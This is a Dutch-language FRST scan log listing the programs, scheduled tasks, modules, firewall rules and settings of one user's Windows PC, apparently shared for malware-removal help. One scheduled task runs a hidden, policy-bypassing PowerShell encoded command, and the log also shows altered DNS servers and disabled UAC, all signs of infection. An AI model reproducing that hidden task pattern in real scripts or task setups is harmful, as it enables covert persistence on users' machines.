Windows Driver Package - Broadcom Bluetooth  (07/30/2009 6.2.0.9405) (HKLM\...\6B6B5E96843E55CF5CF8C7E45FB457F1FE642FF1) (Version: 07/30/2009 6.2.0.9405 - Broadcom)
Windows Driver Package - Broadcom HIDClass  (07/28/2009 6.2.0.9800) (HKLM\...\3BA80AB4C7E9F8497C115C844953A3D4BEB84D21) (Version: 07/28/2009 6.2.0.9800 - Broadcom)
Windows Essentials Media Codec Pack 3.6 [64-Bit] (HKLM-x32\...\Windows Essentials Media Codec Pack) (Version: 3.6 - Media Codec)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{E34F703A-1C9D-4B1F-ABBE-D7E8800B860D}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
WinFF 1.4.2 (HKLM-x32\...\WinFF_is1) (Version:  - WinFF.org)
WinRAR (HKLM\...\WinRAR archiver) (Version:  - )
World in Conflict MW Mod 2.0 Open Beta (HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\World in Conflict MW Mod 2.0 Open Beta) (Version:  - )
Wuala (HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\Wuala) (Version: 1.0.444.0 - LaCie)
Wuala CBFS (HKLM-x32\...\Wuala CBFS) (Version: 3.2.107.0 - LaCie)
Wuala OverlayIcons (HKLM-x32\...\Wuala OverlayIcons) (Version: 1.0.0.2 - LaCie)

==================== Aangepaste CLSID (gefilterd): ==========================

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.)

CustomCLSID: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Thomas\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => Geen bestand

==================== Geplande Taken (gefilterd) =============

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.)

Task: {0FEDF9F1-C757-433D-9853-B7387AAD6CD1} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {257C63E4-9A1B-4D19-B9E0-77E8A95CAB9A} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {39674482-7F1C-43BC-A918-7261BED6C338} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000UA => C:\Users\Thomas\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-17] (Facebook Inc.)
Task: {397422DB-C117-4E84-99CD-C19801182DA8} - System32\Tasks\{8B4D71D3-DC18-FA14-C88F-B60E35A1D3FA} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand
Task: {43729264-2744-40AC-B524-E27E5435E40F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-19] (Google Inc.)
Task: {45B1D9F5-4E01-4C25-8EA0-309E3A42E0FC} - System32\Tasks\{3A842F23-6945-48D7-BD0B-B8BF1E563B7B} => pcalua.exe -a C:\Users\Thomas\Desktop\SetupFTD385\SetupFTD3.8.5.exe -d C:\Users\Thomas\Desktop\SetupFTD385
Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {5D0DE340-0D4F-4A04-975F-51D624188D89} - System32\Tasks\CCleanerSkipUAC => C:\Program Files (x86)\CCleaner\CCleaner.exe [2015-02-19] (Piriform Ltd)
Task: {652152BC-1A6F-4A69-8195-B6AD319E2A2A} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {8BE38757-2493-4494-AB86-F8F4BF06A7E4} - System32\Tasks\Windows Codec Update Service => C:\Program Files (x86)\Essentials Codec Pack\WECPUpdate.exe [2011-07-14] (MediaCodec.Org)
Task: {A128DFD6-A81B-49BD-9796-1E3BB3141B94} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-03-22] (Adobe Systems Incorporated)
Task: {BAC338EB-2A0F-4CA2-91D2-3DB566B6E177} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-01-30] (Dropbox, Inc.)
Task: {BB812E2B-BBD5-4BFB-A81B-CDE56BB6B604} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000Core => C:\Users\Thomas\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-17] (Facebook Inc.)
Task: {C8128D71-7F5D-42F2-8724-7D8C46CA2E69} - System32\Tasks\{9BEA03FA-903D-4CFD-AF30-7146078F46F0} => C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE [2015-12-11] (Microsoft Corporation)
Task: {D3ABE494-F430-4810-80FE-B3182580C7AB} - System32\Tasks\{DDA7CC43-0A4D-468A-A92C-5225F06876D6} => C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE [2015-12-11] (Microsoft Corporation)
Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc
Task: {DF9F4691-7A55-4B6C-94D5-C6C9BF5811A5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-19] (Google Inc.)
Task: {E6E43EF7-522A-4622-B7C3-88CF7850E374} - System32\Tasks\Launch HTC Sync Loader => C:\Program Files (x86)\HTC\HTC Sync 3.0\htcUPCTLoader.exe
Task: {E7388D23-6953-43D9-A5EB-B9B362355068} - System32\Tasks\{44F3AA93-0DB5-41FF-AB9A-2511FC6D6C4B} => Firefox.exe hxxp://ui.skype.com/ui/0/5.3.0.111.259/nl/abandoninstall?source=lightinstaller&page=tsDownload&installinfo=google-toolbar:notoffered;ienotdefaultbrowser2,google-chrome:notoffered;userlevelpresent
Task: {EFD6655D-12A3-4620-A5EE-AD497954D351} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-01-30] (Dropbox, Inc.)
Task: {F5F67ADC-174A-4474-86C3-E3D5985A97DB} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)

(Als een item is opgenomen in de fixlist, de taak (job) bestand wordt verplaatst. Het bestand dat wordt uitgevoerd door de taak zal niet worden verplaatst.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000Core.job => C:\Users\Thomas\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000UA.job => C:\Users\Thomas\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Snelkoppelingen =============================

(De items kunnen worden opgenomen in de fixlist.txt om hersteld of verwijderd te worden.)

==================== Geladen Modules (gefilterd) ==============

2015-03-22 14:33 - 2015-02-04 03:21 - 00115400 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2012-12-07 17:27 - 2012-12-07 17:27 - 00167424 _____ () C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
2010-08-14 15:09 - 2010-08-17 22:20 - 00075064 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2010-08-15 11:12 - 2010-03-15 10:28 - 00166400 _____ () C:\Program Files\WinRAR\rarext.dll
2014-01-20 13:17 - 2014-01-20 13:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-10-30 21:24 - 2014-10-30 21:24 - 03752448 _____ () c:\Program Files (x86)\VideoCnv\Zet.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 00034768 _____ () C:\Program Files (x86)\Dropbox\Client\_multiprocessing.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\faulthandler.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00022848 _____ () C:\Program Files (x86)\Dropbox\Client\Crypto.Random.OSRNG.winrandom.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00023352 _____ () C:\Program Files (x86)\Dropbox\Client\Crypto.Util._counter.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00042296 _____ () C:\Program Files (x86)\Dropbox\Client\Crypto.Cipher._AES.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00116688 _____ () C:\Program Files (x86)\Dropbox\Client\pywintypes27.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 00093640 _____ () C:\Program Files (x86)\Dropbox\Client\_ctypes.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00018376 _____ () C:\Program Files (x86)\Dropbox\Client\select.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00019760 _____ () C:\Program Files (x86)\Dropbox\Client\tornado.speedups.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00105928 _____ () C:\Program Files (x86)\Dropbox\Client\win32api.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00392144 _____ () C:\Program Files (x86)\Dropbox\Client\pythoncom27.dll
2016-01-30 12:36 - 2015-12-22 01:22 - 00381752 _____ () C:\Program Files (x86)\Dropbox\Client\win32com.shell.shell.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00692688 _____ () C:\Program Files (x86)\Dropbox\Client\unicodedata.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._constant_time.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00109520 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_backend.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 01734984 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._openssl.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00020808 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._padding.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_python_x66cf7a7cx17a72769.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00021840 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_unicode_environ_win32_x8bf8e68bx9968e850.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00038696 _____ () C:\Program Files (x86)\Dropbox\Client\fastpath.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00024528 _____ () C:\Program Files (x86)\Dropbox\Client\win32event.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00020936 _____ () C:\Program Files (x86)\Dropbox\Client\mmapfile.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00114640 _____ () C:\Program Files (x86)\Dropbox\Client\win32security.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00021320 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_pywin_kernel32_xde9e4433x360333f0.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00124880 _____ () C:\Program Files (x86)\Dropbox\Client\win32file.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00030160 _____ () C:\Program Files (x86)\Dropbox\Client\win32pipe.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00043472 _____ () C:\Program Files (x86)\Dropbox\Client\win32process.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00175560 _____ () C:\Program Files (x86)\Dropbox\Client\win32gui.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00028616 _____ () C:\Program Files (x86)\Dropbox\Client\win32ts.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32clipboard.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00048592 _____ () C:\Program Files (x86)\Dropbox\Client\win32service.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00024392 _____ () C:\Program Files (x86)\Dropbox\Client\librsyncffi.compiled._librsyncffi.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00036296 _____ () C:\Program Files (x86)\Dropbox\Client\librsync.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32profile.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00117056 _____ () C:\Program Files (x86)\Dropbox\Client\breakpad.client.windows.handler.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00023376 _____ () C:\Program Files (x86)\Dropbox\Client\winscreenshot.compiled._CaptureScreenshot.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00134608 _____ () C:\Program Files (x86)\Dropbox\Client\_elementtree.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00134088 _____ () C:\Program Files (x86)\Dropbox\Client\pyexpat.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00240584 _____ () C:\Program Files (x86)\Dropbox\Client\jpegtran.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00020280 _____ () C:\Program Files (x86)\Dropbox\Client\cpuid.compiled._cpuid.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00052024 _____ () C:\Program Files (x86)\Dropbox\Client\psutil._psutil_windows.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00021304 _____ () C:\Program Files (x86)\Dropbox\Client\Crypto.Util.strxor.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00350152 _____ () C:\Program Files (x86)\Dropbox\Client\winxpgui.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00084792 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_sqlite_ext.DLL
2016-01-30 12:36 - 2015-12-22 01:22 - 01826608 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtCore.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00083912 _____ () C:\Program Files (x86)\Dropbox\Client\sip.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 03891504 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWidgets.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 01950000 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtGui.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00519984 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtNetwork.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00133936 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKit.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00225080 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKitWidgets.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00207672 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtPrintSupport.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00024904 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_wpad_proxy_win_x752e3d61xdcfdcc84.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00486704 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQuick.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00357680 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQml.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00019920 _____ () C:\Program Files (x86)\Dropbox\Client\QtQuick.2\qtquick2plugin.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 00786904 _____ () C:\Program Files (x86)\Dropbox\Client\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 00063448 _____ () C:\Program Files (x86)\Dropbox\Client\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\QtQuick\Window.2\windowplugin.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 00063432 _____ () C:\Program Files (x86)\Dropbox\Client\libEGL.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 01135568 _____ () C:\Program Files (x86)\Dropbox\Client\libGLESv2.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf
2014-12-11 22:58 - 2014-12-11 22:59 - 03758192 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF

==================== Alternate Data Streams (gefilterd) =========

(Als een item is opgenomen in de fixlist, alleen de ADS wordt verwijderd.)

AlternateDataStreams: C:\Windows\System32:{DA6227CB-326B-4B4D-9A81-04B61F1538DD}
AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\ProgramData\Temp:5C321E34
AlternateDataStreams: C:\Users\Thomas\.DS_Store:AFP_AfpInfo

==================== Veilige Modus (gefilterd) ===================

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. De "AlternateShell" waarde wordt hersteld.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Bestandskoppeling (gefilterd) ===============

(Als een item is opgenomen in de fixlist, het registry item zal worden teruggezet naar de standaardwaarden of verwijderd.)


==================== Internet Explorer vertrouwde/beperkte toegang ===============

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd.)


Er zijn 6091 Meer websites.


==================== Hosts inhoud: ===============================

(Als nodig Hosts: opdracht kan worden opgenomen in de fixlist om Hosts te resetten.)

2009-07-14 03:34 - 2009-06-10 22:00 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts


==================== Andere gebieden ============================

(Momenteel is er geen automatische fix voor dit onderdeel.)

HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Thomas\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 82.163.142.3 - 95.211.158.130
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is ingeschakeld.

==================== MSCONFIG/TASK MANAGER Uitgeschakelde items ==

(Momenteel is er geen automatische fix voor dit onderdeel.)

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: Skype C2C Service => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: TeamViewer6 => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Assistent content manager voor PlayStation®.lnk => C:\Windows\pss\Assistent content manager voor PlayStation®.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\Windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BCSSync => "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
MSCONFIG\startupreg: Communicator => "C:\Program Files (x86)\Microsoft Office Communicator\communicator.exe" /fromrunkey
MSCONFIG\startupreg: Corel File Shell Monitor => C:\Program Files (x86)\Corel\Corel Paint Shop Pro Photo X2\CorelIOMonitor.exe
MSCONFIG\startupreg: Facebook Update => "C:\Users\Thomas\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
MSCONFIG\startupreg: Google Update => "C:\Users\Thomas\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: HPCam_Menu => "c:\Program Files (x86)\Hewlett-Packard\Media\Webcam\MUITransfer\MUIStartMenu.exe" "c:\Program Files (x86)\Hewlett-Packard\Media\Webcam" UpdateWithCreateOnce "Software\Hewlett-Packard\Media\Webcam"
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: OfficeSyncProcess => "C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE"
MSCONFIG\startupreg: QlbCtrl.exe => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: SmartMenu => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe /background
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\steam.exe" -silent
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: SynTPEnh => %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe
MSCONFIG\startupreg: uTorrent => "C:\Users\Thomas\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED
MSCONFIG\startupreg: WirelessAssistant => C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe

==================== Firewall regels (gefilterd) ===============

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.)

FirewallRules: [{F00D4002-E17D-4B1B-91FF-5A315720382F}] => (Allow) F:\fsetup.exe
FirewallRules: [{6C26C728-A1D8-46DE-9269-CB283BB5E12F}] => (Allow) F:\fsetup.exe
FirewallRules: [{3EBAE667-9F2F-4536-9B94-0697BE57E034}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0EE9562A-BCD7-4641-A4FC-326A845BD1E3}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{144C6564-E404-4E4C-9EA7-50054CD6C34B}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0A62C299-43B3-4FFB-821B-B123B94E76DF}] => (Allow) svchost.exe
FirewallRules: [{D8F0AE94-485B-4B0C-9E59-6B0B51DE4DB5}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{D0479C0B-D4C2-4156-885B-BF7096541A1A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{382DFE0E-C4D8-4F46-9AC9-8A9EB4140B36}G:\halo\halo.exe] => (Allow) G:\halo\halo.exe
FirewallRules: [UDP Query User{08C16232-0C8B-4942-A113-43C4D82217DF}G:\halo\halo.exe] => (Allow) G:\halo\halo.exe
FirewallRules: [{56C778F3-1DC5-4404-9626-423A0D416ECD}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{A86A717A-F2DB-465E-B402-91F2DAE6197B}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{968A7FC9-81AE-4034-8959-12329E12F8C5}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{04073867-D264-47A7-B072-1CD5E5F8AF25}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [TCP Query User{D5DBC37F-B8AB-42A3-8DE9-B45E0BC3EAE5}G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe] => (Allow) G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe
FirewallRules: [UDP Query User{C8D13C3B-5169-4786-9D62-81A339EEEF63}G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe] => (Allow) G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe
FirewallRules: [{489E01D9-C5D7-4CAA-848C-11521262AAEE}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{0C42F0E1-7FFE-4458-9021-7C51547470BE}C:\program files\internet explorer\iexplore.exe] => (Block) C:\program files\internet explorer\iexplore.exe
FirewallRules: [UDP Query User{B9DFAA09-BE34-4326-A6DA-1B5D0752906C}C:\program files\internet explorer\iexplore.exe] => (Block) C:\program files\internet explorer\iexplore.exe
FirewallRules: [{7F46BDE3-4A1E-494C-AC9D-E1D9EEAC98E0}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{F95DF410-3357-4159-AB93-89495D859CBC}G:\halo\halo.exe] => (Allow) G:\halo\halo.exe
FirewallRules: [UDP Query User{0EECF269-3D52-4E45-A723-3B5128EA764B}G:\halo\halo.exe] => (Allow) G:\halo\halo.exe
FirewallRules: [{22330033-C6B6-4856-8A2F-42B335C712C0}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{2E2749F1-6E77-4960-A39F-459484A668C8}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{6B2FCA87-EEF5-42E5-A144-F2E4DF39E582}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{84C1C985-B008-426D-824F-E9C8B582C552}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{C8AF21BD-2A75-4BF4-93A0-05161BD3E5E5}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{B7914EEC-3729-45E6-B581-24D5CEE131E4}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe
FirewallRules: [{04A2FCBE-8A59-4A41-A350-24E6CB64B465}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe
FirewallRules: [{2CDDC6BC-DD65-4A88-8D42-794A5228F928}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{FD6C8B6D-0643-431D-AA34-9F9DE38636DF}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{AB26D5B8-A682-42A3-8085-B2C82BDD06CD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exe
FirewallRules: [{58E63EF6-D08C-4CBA-9201-1F4E1D425F32}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{9F7E1BDC-1A90-4EB0-A49F-ECCFB793492F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe
FirewallRules: [{A67E1489-5F8F-4A90-9712-3C2CE97CECA8}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{473230AA-EEB1-4DAD-9D64-10D401F725B4}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqnrs08.exe
FirewallRules: [{FB809197-1D31-4AF5-8FA4-0199B86FCBB4}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{7DC422A0-CF96-4330-A865-0863A82E0ABB}] => (Allow) C:\Program Files (x86)\common files\hp\digital imaging\bin\hpqphotocrm.exe
FirewallRules: [{056128B8-8CE2-447C-ABD2-C88933EC7BE0}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqsudi.exe
FirewallRules: [{9AA390FF-8D5D-4CBD-8D70-2A8E2DD1041C}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqpsapp.exe
